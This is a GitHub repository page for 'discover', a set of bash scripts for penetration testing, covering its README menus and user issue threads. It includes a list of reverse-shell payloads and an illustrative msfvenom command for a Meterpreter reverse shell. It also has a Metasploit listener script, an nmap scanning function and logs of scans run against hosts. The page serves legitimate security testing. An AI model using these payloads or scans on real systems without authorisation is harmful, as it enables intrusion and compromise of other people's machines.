leebaird / discover

Custom bash scripts used to automate various penetration testing tasks including recon, scanning, enumeration, and malicious payload creation using Metasploit. For use with Kali Linux.

License: MIT License

red-team bash nmap metasploit scanning osint recon kali-linux payload-generator reconnaissance

discover's Introduction



  • Lee Baird on Twitter: @discoverscripts
  • Jay "L1ghtn1ng" Townsend on Twitter: @jay_townsend1
  • Jason Ashton on Twitter: @ninewires

Download, setup, and usage

  • git clone https://github.com/leebaird/discover /opt/discover/
  • Discover should be run as root from this location.
  • cd /opt/discover/
  • sudo ./discover.sh
  • Select option 15 to update Kali Linux, Discover scripts, various tools, and the locate database before using the framework.
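The two most common setup mistakes are launching from the wrong location and not running as root. A hypothetical pre-flight wrapper (not part of Discover; the `check_install` function name and its messages are invented for this sketch) could catch both before starting:

```shell
#!/usr/bin/env bash
# Hypothetical pre-flight check, not part of Discover itself.
# Verifies the script exists at the install location and that we are root.
check_install() {
    local dir="${1:-/opt/discover}"
    if [ ! -x "$dir/discover.sh" ]; then
        echo "missing: $dir/discover.sh (clone the repo first)"
        return 1
    fi
    if [ "$(id -u)" -ne 0 ]; then
        echo "run as root: sudo $dir/discover.sh"
        return 1
    fi
    echo "ok"
}
```

The directory is a parameter so the check works for non-default install locations as well.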
RECON
1.  Domain
2.  Person

SCANNING
3.  Generate target list
4.  CIDR
5.  List
6.  IP, range, or URL
7.  Rerun Nmap scripts and MSF aux

WEB
8.  Insecure direct object reference
9.  Open multiple tabs in Firefox
10. Nikto
11. SSL

MISC
12. Parse XML
13. Generate a malicious payload
14. Start a Metasploit listener
15. Update
16. Exit

RECON

Domain

RECON

1.  Passive
2.  Active
3.  Find registered domains
4.  Previous menu

Passive uses ARIN, DNSRecon, dnstwist, goog-mail, goohost, theHarvester, Metasploit, Whois, multiple websites, and recon-ng.

Active uses DNSRecon, recon-ng, Traceroute, wafw00f, and Whatweb.

Acquire API keys for maximum results with theHarvester.

  • Add keys to /etc/theHarvester/api-keys.yaml
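The api-keys.yaml file is a simple YAML map of service names to keys. The exact set of services depends on your theHarvester version; the layout below is only a representative sketch with placeholder values:

```yaml
apikeys:
  bing:
    key: your-bing-key
  github:
    key: your-github-token
  shodan:
    key: your-shodan-key
```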

Person

RECON

First name:
Last name:
  • Combines info from multiple websites.

SCANNING

Generate target list

SCANNING

1.  ARP scan
2.  Ping sweep
3.  Previous menu
  • Uses different tools to create a target list, including Angry IP Scanner, arp-scan, netdiscover, and an Nmap ping sweep.

CIDR, List, IP, Range, or URL

Type of scan:

1.  External
2.  Internal
3.  Previous menu
  • External scan will set the Nmap source port to 53 and the max-rtt-timeout to 1500ms.
  • Internal scan will set the Nmap source port to 88 and the max-rtt-timeout to 500ms.
  • Nmap is used to perform host discovery, port scanning, service enumeration, and OS identification.
  • Nmap scripts and Metasploit auxiliary modules are used for additional enumeration.
  • Additional tools: enum4linux, smbclient, and ike-scan.
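Conceptually, the working files a scan like this produces (live hosts, open ports) come from filtering Nmap's grepable output. A minimal sketch of that idea, not the framework's actual code (`parse_gnmap` is invented for this illustration):

```shell
#!/usr/bin/env bash
# Illustrative sketch: pull live hosts and open TCP ports out of Nmap's
# grepable (.gnmap) output into simple working files.
parse_gnmap() {
    local gnmap="$1"
    # Hosts that reported at least one open port
    grep '/open/' "$gnmap" | awk '{print $2}' | sort -u > hosts.txt
    # Open TCP port numbers, one per line, numerically sorted
    grep -oE '[0-9]+/open/tcp' "$gnmap" | cut -d '/' -f1 | sort -un > ports-tcp.txt
}
```

The resulting hosts.txt / ports-tcp.txt files can then feed follow-up enumeration tools.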

WEB

Insecure direct object reference

Using Burp, authenticate to a site, map and spider it, then log out.
Target > Site map > select the URL > right click > Copy URLs in
this host. Paste the results into a new file.

Enter the location of your file:

Open multiple tabs in Firefox

Open multiple tabs in Firefox with:

1.  List
2.  Files in a directory
3.  Directories in robots.txt
4.  Previous menu

Examples:

  • A list containing multiple IPs and/or URLs.
  • You finished scanning multiple websites with Nikto and want to open every HTML report located in a directory.
  • Use wget to download a domain's robots.txt file, then open all of the directories.
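The robots.txt example boils down to turning Disallow entries into full URLs. A minimal sketch with example.com as a placeholder (Discover would then open each URL in a Firefox tab; this just prints them):

```shell
#!/usr/bin/env bash
# Illustrative sketch: convert a robots.txt file's Disallow paths into URLs.
robots_to_urls() {
    local base="$1" robots="$2"
    # Pull the path out of each Disallow line and prepend the base URL
    grep -i '^Disallow:' "$robots" | awk '{print $2}' |
    while read -r path; do
        echo "${base}${path}"
    done
}
```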

Nikto

This option cannot be run as root.

Run multiple instances of Nikto in parallel.

1.  List of IPs
2.  List of IP:port
3.  Previous menu
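Fanning a scanner out over a target list is commonly done with xargs -P. In this sketch, echo stands in for the real nikto invocation (e.g. `nikto -h <target>`) so it is safe to run:

```shell
#!/usr/bin/env bash
# Illustrative sketch: run up to N jobs in parallel over a target list.
scan_parallel() {
    local list="$1" jobs="${2:-4}"
    # -n 1: one target per invocation; -P: up to $jobs concurrent processes.
    # "echo scanning" is a stand-in for the real scanner command.
    xargs -P "$jobs" -n 1 echo scanning < "$list"
}
```

Because jobs run concurrently, output order is not guaranteed; sort it if you need a stable view.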

SSL

Check for SSL certificate issues.

List of IP:port.


Enter the location of your file:
  • Uses sslscan, sslyze, and nmap to check for SSL/TLS certificate issues.
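Feeding a list of IP:port pairs to the SSL tools is a simple split-and-loop; in this sketch the sslscan/sslyze calls are left commented out so only the loop runs:

```shell
#!/usr/bin/env bash
# Illustrative sketch: iterate over a file of host:port pairs.
check_ssl_targets() {
    # Each input line is host:port; a missing port defaults to 443.
    while IFS=: read -r host port; do
        if [ -z "$host" ]; then
            continue
        fi
        echo "checking $host on port ${port:-443}"
        # sslscan "$host:${port:-443}"
        # sslyze "$host:${port:-443}"
    done < "$1"
}
```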

MISC

Parse XML

Parse XML to CSV.

1.  Burp (Base64)
2.  Nessus (.nessus)
3.  Nexpose (XML 2.0)
4.  Nmap
5.  Qualys
6.  Previous menu
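The real parsers work on each tool's XML output; as a simplified illustration of the same host,port,service flattening, here is a sketch that converts Nmap grepable output to CSV (`gnmap_to_csv` is invented for this example):

```shell
#!/usr/bin/env bash
# Illustrative sketch: flatten Nmap grepable output into host,port,service
# CSV rows (the real Discover parsers consume the XML output instead).
gnmap_to_csv() {
    echo "host,port,service"
    grep 'Ports:' "$1" | while read -r line; do
        host=$(echo "$line" | awk '{print $2}')
        # Each open-port token looks like: 22/open/tcp//ssh///
        echo "$line" | grep -oE '[0-9]+/open/[a-z]+//[^/]*' |
        while IFS=/ read -r port _ _ _ svc; do
            echo "$host,$port,$svc"
        done
    done
}
```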

Generate a malicious payload

Malicious Payloads

1.   android/meterpreter/reverse_tcp         (.apk)
2.   cmd/windows/reverse_powershell          (.bat)
3.   java/jsp_shell_reverse_tcp (Linux)      (.jsp)
4.   java/jsp_shell_reverse_tcp (Windows)    (.jsp)
5.   java/shell_reverse_tcp                  (.war)
6.   linux/x64/meterpreter_reverse_https     (.elf)
7.   linux/x64/meterpreter_reverse_tcp       (.elf)
8.   linux/x64/shell/reverse_tcp             (.elf)
9.   osx/x64/meterpreter_reverse_https       (.macho)
10.  osx/x64/meterpreter_reverse_tcp         (.macho)
11.  php/meterpreter_reverse_tcp             (.php)
12.  python/meterpreter_reverse_https        (.py)
13.  python/meterpreter_reverse_tcp          (.py)
14.  windows/x64/meterpreter_reverse_https   (multi)
15.  windows/x64/meterpreter_reverse_tcp     (multi)
16.  Previous menu
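Under the hood, payload generation of this kind is an msfvenom invocation. This sketch only builds the command string (the LHOST, LPORT, and output-file values are placeholders) rather than running it:

```shell
#!/usr/bin/env bash
# Illustrative sketch: construct (do not execute) an msfvenom command line.
# -p payload, -f output format, and -o output file are standard msfvenom flags.
build_msfvenom_cmd() {
    local payload="$1" lhost="$2" lport="$3" fmt="$4" out="$5"
    echo "msfvenom -p $payload LHOST=$lhost LPORT=$lport -f $fmt -o $out"
}

# Example: a Windows x64 reverse TCP Meterpreter (values are placeholders)
build_msfvenom_cmd windows/x64/meterpreter_reverse_tcp 10.0.0.1 443 exe payload.exe
```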

Start a Metasploit listener

Metasploit Listeners

1.   android/meterpreter/reverse_tcp
2.   cmd/windows/reverse_powershell
3.   java/jsp_shell_reverse_tcp
4.   linux/x64/meterpreter_reverse_https
5.   linux/x64/meterpreter_reverse_tcp
6.   linux/x64/shell/reverse_tcp
7.   osx/x64/meterpreter_reverse_https
8.   osx/x64/meterpreter_reverse_tcp
9.   php/meterpreter/reverse_tcp
10.  python/meterpreter_reverse_https
11.  python/meterpreter_reverse_tcp
12.  windows/x64/meterpreter_reverse_https
13.  windows/x64/meterpreter_reverse_tcp
14.  Previous menu
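A listener for any of the payloads above is typically a small msfconsole resource script along these lines (LHOST and LPORT are placeholders; the payload must match the one you generated):

```
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_tcp
set LHOST 10.0.0.1
set LPORT 443
set ExitOnSession false
exploit -j -z
```

Loading it with `msfconsole -r listener.rc` starts the handler as a background job.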

Update

  • Update Kali Linux, Discover scripts, various tools, and the locate database.

Troubleshooting

Some users have reported being unable to use any options except for 3, 4, and 5. Nothing happens when choosing other options (1, 2, 6, etc.).

Always run Discover as root

cd /opt/discover/
sudo ./discover.sh

Verify the download hash

Hash-based verification ensures that a file has not been corrupted by comparing the file's hash value to a previously calculated value. If these values match, the file is presumed to be unmodified.

macOS

  1. Open Terminal
  2. shasum -a 256 /path/to/file
  3. Compare the value to the checksum on the website.

Windows

  1. Open PowerShell
  2. Get-FileHash C:\path\to\file
  3. Compare the value to the checksum on the website.
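On Kali itself the same check uses sha256sum. A small sketch; the expected value would normally come from the download page (the checksum shown in the test is just the hash of the word "hello" for demonstration):

```shell
#!/usr/bin/env bash
# Illustrative sketch: compare a file's SHA-256 against a published checksum.
verify_sha256() {
    local file="$1" expected="$2"
    local actual
    actual=$(sha256sum "$file" | awk '{print $1}')
    if [ "$actual" = "$expected" ]; then
        echo "OK: checksum matches"
    else
        echo "MISMATCH: got $actual"
        return 1
    fi
}
```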

Running Kali on VirtualBox or Windows Subsystem for Linux (WSL)

Some users have reported the fix is to use the VMware image instead of WSL. (https://kali.download/virtual-images/kali-2022.3/kali-linux-2022.3-vmware-amd64.7z.torrent)

Other users have noticed issues when running a pre-made VirtualBox Kali image, instead of running the bare metal Kali ISO through VirtualBox. (https://www.kali.org/get-kali/#kali-bare-metal)

If you are unwilling or unable to use VMware Workstation to run Kali, we encourage you to try running a Kali ISO as a guest VM in VirtualBox.

  1. Download the bare metal ISO provided by Kali.
  2. Verify the ISO hash (see above).
  3. Start a new Kali VM within VirtualBox with the bare metal Kali ISO.

You will be asked to fill out some basic configuration options during the installation.

Note: If you have problems accessing root after setting up a bare metal ISO, please refer to: https://linuxconfig.org/how-to-reset-kali-linux-root-password

discover's People

Contributors

aestone24, arthurakay, cmd-space, insaneminer, joacole, l1ghtn1ng, leebaird, michael-hart-github, ninewires, noraj


discover's Issues

(Suggestion) f_metasploit() as a separate option

I ran a scan, but my network dropped out when I went to run the Metasploit auxiliaries at the end of the script. The only option I see is to rerun the entire scan to get back to this point.

It would be great to have f_metasploit() available as an option in the folder where the report and supporting docs are dropped.

More tools to consider.

httpscreenshot or EyeWitness

snmpwalk -c public -v1 targetIP
snmpcheck -c public -t targetIP
snmpenum -t targetIP

tnscmd10g version -h targetIP
tnscmd10g status -h targetIP

iDRAC MSF or Hydra

crackmapexec
smbclient
smbmap

License missing

Could you please add whatever license you like?

Your code is technically undistributable without a license in most countries. I browsed through the repo and couldn't find one. If there is one could you please point it out?

Thanks

theHarvester stops searching when it switches to Baidu

Hi Lee,

I love this tool, but I have a problem with theHarvester: when it starts searching through Baidu, it stops and does not continue any further. When I cancel the search and run passive gathering again, it sometimes completes normally. See the screenshot below.
Do you know what it could be?

Thanks a lot.

screenshot from 2017-02-02 10-58-23

adding option for no ping during port scan

f_scan(){
# $location, $excludefile, $maxrtt, $sourceport, $name, $sip, $medium, and
# f_error are set elsewhere in discover.sh.
custom='1-1040,1050,1080,1099,1125,1158,1194,1214,1220,1344,1352,1433,1500,1503,1521,1524,1526,1720,1723,1731,1812,1813,1953,1959,2000,2002,2030,2049,2100,2121,2200,2202,2222,2301,2375,2381,2401,2433,2456,2500,2556,2628,2745,2780-2783,2947,3000,3001,3031,3121,3127,3128,3200,3201,3230-3235,3260,3268,3269,3306,3310,3339,3389,3460,3500,3527,3632,3689,4000,4045,4100,4242,4369,4430,4443,4445,4661,4662,4711,4848,5000,5001,5009,5010,5019,5038,5040,5059,5060,5061,5101,5180,5190,5191,5192,5193,5250,5432,5554,5555,5560,5566,5631,5666,5672,5678,5800,5801,5802,5803,5804,5850,5900-6009,6101,6106,6112,6161,6346,6379,6588,6666,6667,6697,6777,7000,7001,7002,7070,7100,7210,7510,7634,7777,7778,8000,8001,8004,8005,8008,8009,8080,8081,8082,8083,8091,8098,8099,8100,8180,8181,8222,8332,8333,8383,8384,8400,8443,8444,8470-8480,8500,8787,8834,8866,8888,9090,9100,9101,9102,9160,9343,9470-9476,9480,9495,9996,9999,10000,10025,10168,11211,12000,12345,12346,13659,15000,16080,18181-18185,18207,18208,18231,18232,19150,19190,19191,20034,22226,27017,27374,27665,28784,30718,31337,32764,32768,32771,33333,35871,37172,38903,39991,39992,40096,46144,46824,49400,50000,50030,50060,50070,50075,50090,51080,51443,53050,54320,58847,60000,60010,60030,60148,60365,62078,63148'
full='1-65535'
udp='53,67,123,137,161,500,523,1434,1604,2302,3478,3671,4070,5353,6481,17185,31337,44818,47808'
yesping='-sP -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,49152'
noping='-Pn'

echo
echo -n "Perform ping scan? (y/N) "
read discping

if [ "$discping" == "y" ]; then
     pingscans=$yesping
else
     pingscans=$noping
fi

echo
echo -n "Perform full TCP port scan? (y/N) "
read scan

if [ "$scan" == "y" ]; then
     tcp=$full
else
     tcp=$custom
fi

echo
echo -n "Perform version detection? (y/N) "
read vdetection

if [ "$vdetection" == "y" ]; then
     S='sSV'
     U='sUV'
else
     S='sS'
     U='sU'
fi

echo
echo -n "Set scan delay. (0-5, enter for normal) "
read delay

# Check for no answer
if [[ -z $delay ]]; then
     delay='0'
fi

if [ $delay -lt 0 ] || [ $delay -gt 5 ]; then
     f_error
fi

echo
echo $medium

nmap -iL $location --excludefile $excludefile -n -$S -$U $pingscans -p T:$tcp,U:$udp --max-retries 3 --min-rtt-timeout 100ms --max-rtt-timeout $maxrtt --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -g $sourceport --scan-delay $delay -oA $name/nmap

x=$(grep '(0 hosts up)' $name/nmap.nmap)

if [[ -n $x ]]; then
     rm -rf "$name" tmp
     echo
     echo $medium
     echo
     echo "Scan complete."
     echo
     echo
     echo -e "\x1B[1;33m[*] No live hosts were found.\x1B[0m"
     echo
     echo
     exit
fi

# Clean up
egrep -v '(0000:|0010:|0020:|0030:|0040:|0050:|0060:|0070:|0080:|0090:|00a0:|00b0:|00c0:|00d0:|1 hop|closed|guesses|GUESSING|filtered|fingerprint|FINGERPRINT|general purpose|initiated|latency|Network Distance|No exact OS|No OS matches|OS:|OS CPE|Please report|RTTVAR|scanned in|SF|unreachable|Warning|WARNING)' $name/nmap.nmap | sed 's/Nmap scan report for //' | sed '/^$/! b end; n; /^$/d; : end' > $name/nmap.txt

grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' $name/nmap.nmap | $sip > $name/hosts.txt
hosts=$(wc -l $name/hosts.txt | cut -d ' ' -f1)

grep 'open' $name/nmap.txt | grep -v 'WARNING' | awk '{print $1}' | sort -un > $name/ports.txt
grep 'tcp' $name/ports.txt | cut -d '/' -f1 > $name/ports-tcp.txt
grep 'udp' $name/ports.txt | cut -d '/' -f1 > $name/ports-udp.txt

grep 'open' $name/nmap.txt | grep -v 'really open' | awk '{for (i=4;i<=NF;i++) {printf "%s%s",sep, $i;sep=" "}; printf "\n"}' | sed 's/^ //' | sort -u | sed '/^$/d' > $name/banners.txt

for i in $(cat $name/ports-tcp.txt); do
     TCPPORT=$i
     cat $name/nmap.gnmap | egrep " $i/open/tcp//http/| $i/open/tcp//http-alt/| $i/open/tcp//http-proxy/| $i/open/tcp//appserv-http/" |
     sed -e 's/Host: //g' -e 's/ (.*//g' -e 's.^.http://.g' -e "s/$/:$i/g" | $sip >> tmp
     cat $name/nmap.gnmap | egrep " $i/open/tcp//https/| $i/open/tcp//https-alt/| $i/open/tcp//ssl|giop/| $i/open/tcp//ssl|http/| $i/open/tcp//ssl|unknown/" |
     sed -e 's/Host: //g' -e 's/ (.*//g' -e 's.^.https://.g' -e "s/$/:$i/g" | $sip >> tmp2
done

sed 's|http://||g' tmp > $name/http.txt
sed 's|https://||g' tmp2 > $name/https.txt

# Remove all empty files
find $name/ -type f -empty -exec rm {} +
}

Remove 123people.com as it has been discontinued

Via: Recon -> Person

123people.com appears to be discontinued.

"Sorry, this service is no longer available.
After six exciting and prosperous years of people search we have taken this service permanently offline and are focusing on other projects.
A big thank you to all our users, partners and followers!
The 123people Team"

theHarvester issues

This is to consolidate all theHarvester issues that have been identified, in one place to track them:

- #87

./discover.sh: line 312: /usr/bin/theHarvester: Permission denied
     Bing                 (10/33)
./discover.sh: line 314: /usr/bin/theHarvester: Permission denied
     Dogpilesearch        (11/33)
./discover.sh: line 316: /usr/bin/theHarvester: Permission denied
     Google               (12/33)
./discover.sh: line 318: /usr/bin/theHarvester: Permission denied
     Google CSE           (13/33)
./discover.sh: line 320: /usr/bin/theHarvester: Permission denied
     Google+              (14/33)
./discover.sh: line 322: /usr/bin/theHarvester: Permission denied
     Google Profiles      (15/33)
./discover.sh: line 324: /usr/bin/theHarvester: Permission denied
     Jigsaw               (16/33)
./discover.sh: line 326: /usr/bin/theHarvester: Permission denied
     LinkedIn             (17/33)
./discover.sh: line 328: /usr/bin/theHarvester: Permission denied
     PGP                  (18/33)
./discover.sh: line 330: /usr/bin/theHarvester: Permission denied
     Yahoo                (19/33)
./discover.sh: line 332: /usr/bin/theHarvester: Permission denied
     All                  (20/33)
./discover.sh: line 334: /usr/bin/theHarvester: Permission denied

This is due to the file not having 700 permissions. It was identified on a test VM with a clean install of Kali.

Kali is patching the file with the following, which is why we are running into issue #87:

--- a/theHarvester.py
+++ b/theHarvester.py
@@ -7,6 +7,7 @@ import os
 from socket import *
 import re
 import getopt
+sys.path.append("/usr/share/theharvester/")

 try:
    import requests

Script is not creating folders

Hello,

Running into an issue running this on Kali 2.x

Here's an example:

Choice: 1

Usage

Company: Target
Domain: target.com

Company: Walmart
Domain: walmart.com
cp: target ‘/root/data/walmart.com’ is not a directory
sed: can't read /root/data/walmart.com/index.htm: No such file or directory
mv: cannot move ‘tmp’ to ‘/root/data/walmart.com/index.htm’: No such file or directory

dnsrecon (1/26)

goofile (2/26)

goog-mail (3/26)
./discover.sh: line 210: /opt/discover: Is a directory

goohost
IP (4/26)
./discover.sh: line 222: /opt/discover: Is a directory
Email (5/26)
./discover.sh: line 224: /opt/discover: Is a directory
cat: report-*: No such file or directory
rm: cannot remove ‘*-walmart.com.txt’: No such file or directory

theHarvester
Baidu (6/26)
Bing (7/26)

Please advise how to fix this.

Thanks

Domain Scan

The passive scan is not working; no file is found.
COMPANY = Company
DOMAIN = Domain.com
It saves as www.domain.com instead of domain.com when it saves files; I can't locate any saved files under /root/data/...

Parse SalesForce

Do I export the csv file and list it down here?

Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.

Enter the location of your file:

What is the parser supposed to do?

Report doesn't show all ports properly.

Ports 10000 (Webmin) and 111 are shown as open in the initial Nmap output. In the report, there is no mention of these ports in the Nmap report list. It does provide additional details towards the bottom, but when glancing at a report I would expect them to be near the top, as they are in the output while running the script. Unsure if this is by design.

[Discover ASCII art banner]

By Lee Baird

Type of scan:

  1. External
  2. Internal
  3. Previous menu

Choice: 1

[*] Setting source port to 53 and the max probe round trip time to 1.5s.

Name of scan: 192.168.xx.xx

IP, Range or URL: 192.168.xx.xx

Perform full TCP port scan? (y/N) y

Perform version detection? (y/N) y

Set scan delay. (0-5, enter for normal)

Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-24 01:41 CDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.47% done; ETC: 01:42 (0:00:34 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 61.68% done; ETC: 01:41 (0:00:12 remaining)
Stats: 0:00:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 7.69% done; ETC: 01:43 (0:01:00 remaining)
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 30.77% done; ETC: 01:42 (0:00:34 remaining)
Stats: 0:00:51 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 30.77% done; ETC: 01:43 (0:00:50 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 30.77% done; ETC: 01:43 (0:01:12 remaining)
Stats: 0:01:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 30.77% done; ETC: 01:44 (0:01:37 remaining)
Stats: 0:01:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 53.85% done; ETC: 01:43 (0:00:45 remaining)
Stats: 0:01:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 72.00% done; ETC: 01:42 (0:00:01 remaining)
Stats: 0:01:40 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 76.00% done; ETC: 01:43 (0:00:04 remaining)
Stats: 0:01:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 76.00% done; ETC: 01:43 (0:00:07 remaining)
Nmap scan report for 192.168.xx.xx
Host is up (0.080s latency).
Not shown: 65521 closed ports, 16 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.0 (protocol 2.0)
111/tcp open rpcbind 2 (RPC #100000)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
32769/tcp open status 1 (RPC #100024)
67/udp open|filtered dhcps
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
500/udp open|filtered isakmp
523/udp open|filtered ibm-db2
1434/udp open|filtered ms-sql-m
2302/udp open|filtered binderysupport
6481/udp open|filtered unknown
17185/udp open|filtered wdbrpc
MAC Address: 00:50:56:AF:66:B7 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.70 seconds

Locating high value ports.
TCP
UDP

Running nmap scripts.
SSH
NFS
Network Data Management

Run matching Metasploit auxiliaries? (y/N) y

Starting Postgres.
[ ok ] Starting PostgreSQL 9.1 database server: main.

Starting Metasploit, this takes about 45 sec.

Using the following resource files.
SSH
NFS
[*] Starting the Metasploit Framework console...|

[Metasploit ASCII art banner]

Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit

   =[ metasploit v4.11.2-2015051401 [core:4.11.2.pre.2015051401 api:1.0.0]]
-- --=[ 1463 exploits - 918 auxiliary - 243 post ]
-- --=[ 376 payloads - 37 encoders - 8 nops ]
-- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /opt/discover/192.168.xx.xx/master.rc for ERB directives.
resource (/opt/discover/192.168.xx.xx/master.rc)> workspace -a 192.168.xx.xx
[*] Added workspace: 192.168.xx.xx
resource (/opt/discover/192.168.xx.xx/master.rc)> setg RHOSTS file:/opt/discover/192.168.xx.xx/22.txt
RHOSTS => file:/opt/discover/192.168.xx.xx/22.txt
resource (/opt/discover/192.168.xx.xx/master.rc)> setg THREADS 255
THREADS => 255
resource (/opt/discover/192.168.xx.xx/master.rc)> setg RPORT 22
RPORT => 22
resource (/opt/discover/192.168.xx.xx/master.rc)> use auxiliary/scanner/ssh/ssh_version
resource (/opt/discover/192.168.xx.xx/master.rc)> run
[*] 192.168.xx.xx:22, SSH server version: SSH-2.0-OpenSSH_4.0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (/opt/discover/192.168.xx.xx/master.rc)> setg RHOSTS file:/opt/discover/192.168.xx.xx/111.txt
RHOSTS => file:/opt/discover/192.168.xx.xx/111.txt
resource (/opt/discover/192.168.xx.xx/master.rc)> setg THREADS 255
THREADS => 255
resource (/opt/discover/192.168.xx.xx/master.rc)> setg RPORT 111
RPORT => 111
resource (/opt/discover/192.168.xx.xx/master.rc)> use auxiliary/scanner/misc/sunrpc_portmapper
resource (/opt/discover/192.168.xx.xx/master.rc)> run

[+] SunRPC Programs for 192.168.xx.xx

Name       Number   Version   Port    Protocol

rpcbind    100000   2         111     tcp
rpcbind    100000   2         111     udp
status     100024   1         32769   udp
status     100024   1         32769   tcp

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (/opt/discover/192.168.xx.xx/master.rc)> use auxiliary/scanner/nfs/nfsmount
resource (/opt/discover/192.168.xx.xx/master.rc)> run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (/opt/discover/192.168.xx.xx/master.rc)> db_export -f xml -a 192.168.xx.xx/metasploit.xml
[*] Starting export of workspace 192.168.xx.xx to 192.168.xx.xx/metasploit.xml [ xml ]...
[*] >> Starting export of report
[*] >> Starting export of hosts
[*] >> Starting export of events
[*] >> Starting export of services
[*] >> Starting export of web sites
[*] >> Starting export of web pages
[*] >> Starting export of web forms
[*] >> Starting export of web vulns
[*] >> Starting export of module details
[*] >> Finished export of report
[*] Finished export of workspace 192.168.xx.xx to 192.168.xx.xx/metasploit.xml [ xml ]...
resource (/opt/discover/192.168.xx.xx/master.rc)> db_import 192.168.xx.xx/nmap.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.6.6.2'
[*] Importing host 192.168.xx.xx
[*] Successfully imported /opt/discover/192.168.xx.xx/nmap.xml
resource (/opt/discover/192.168.xx.xx/master.rc)> exit

_Scan complete._

The new report is located at /root/data/192.168.xx.xx/report.txt

root@ninja:/opt/discover# cat /root/data/192.168.xx.xx/report.txt
Nmap Report
Sunday - May 24, 2015

Start time 01:41:22 AM CDT
Finish time 01:44:22 AM CDT
Scanner IP 10.0.0.xx
192.168.xx.72

1 host discovered.

192.168.xx.xx
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.0 (protocol 2.0)
32769/tcp open status 1 (RPC #100024)
MAC Address: 00:50:56:AF:66:B7 (VMware)

Nmap Scripts

192.168.xx.xx
PORT STATE SERVICE
22/tcp open ssh
| ssh2-enum-algos:
| kex_algorithms: (3)
| diffie-hellman-group-exchange-sha1
| diffie-hellman-group14-sha1
| diffie-hellman-group1-sha1
| server_host_key_algorithms: (2)
| ssh-rsa
| ssh-dss
| encryption_algorithms: (11)
| aes128-cbc
| 3des-cbc
| blowfish-cbc
| cast128-cbc
| arcfour
| aes192-cbc
| aes256-cbc
| rijndael-cbc@lysator.liu.se
| aes128-ctr
| aes192-ctr
| aes256-ctr
| mac_algorithms: (6)
| hmac-md5
| hmac-sha1
| hmac-ripemd160
| hmac-ripemd160@openssh.com
| hmac-sha1-96
| hmac-md5-96
| compression_algorithms: (2)
|_ zlib

192.168.xx.xx
PORT STATE SERVICE
111/tcp open rpcbind
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32769/tcp status
|_ 100024 1 32769/udp status

192.168.xx.xx
PORT STATE SERVICE
10000/tcp open snet-sensor-mgmt
| ndmp-fs-info:
| ndmp-version:

root@ninja:/opt/discover#

Recon > Person

After the last tab opens, about 5 seconds later the terminal opens with a huge stack trace.

Hit <Enter> and you are prompted with an "Invalid choice...." error message.
Iceweasel has not crashed.

Strange output after urlvoid.com

dnssy.com (25/29)
email-format.com (26/29)
ewhois.com (27/29)
myipneighbors.net (28/29)
urlvoid.com (29/29)
QFont::setPixelSize: Pixel size <= 0 (0)
QFont::setPixelSize: Pixel size <= 0 (0)

_Scan complete._

URLCrazy errors

URLCrazy (20/26)
/usr/share/urlcrazy/tld.rb:81: warning: key "2nd_level_registration" is duplicated and overwritten on line 81
/usr/share/urlcrazy/tld.rb:89: warning: key "2nd_level_registration" is duplicated and overwritten on line 89
/usr/share/urlcrazy/tld.rb:91: warning: key "2nd_level_registration" is duplicated and overwritten on line 91

ARIN - POCs

After returning a list of POCs for a domain, open every page and scrape contact name and email.

GLib Error

Getting a ton of errors on a new Kali 2.0 install.

  • Did a git pull
  • Ran update.sh
  • Ran Recon -> Domain -> Passive (#1, #1)
  • The scan completes, but many files are missing from the report web page, like Netcraft, config, etc.

Scan starts fine then gets to the below:


Press <Enter> to continue.

(process:36574): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed
console.error:
[CustomizableUI]
Custom widget with id loop-button does not return a valid node
console.error:
[CustomizableUI]
Custom widget with id loop-button does not return a valid node

(process:36613): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed
...
...
...
(process:37494): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed
(process:37499): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed

Add recon-ng

Use invisible option 98 from the main menu to test.

Use invisible option 97 from the main menu to generate files:
creds.txt
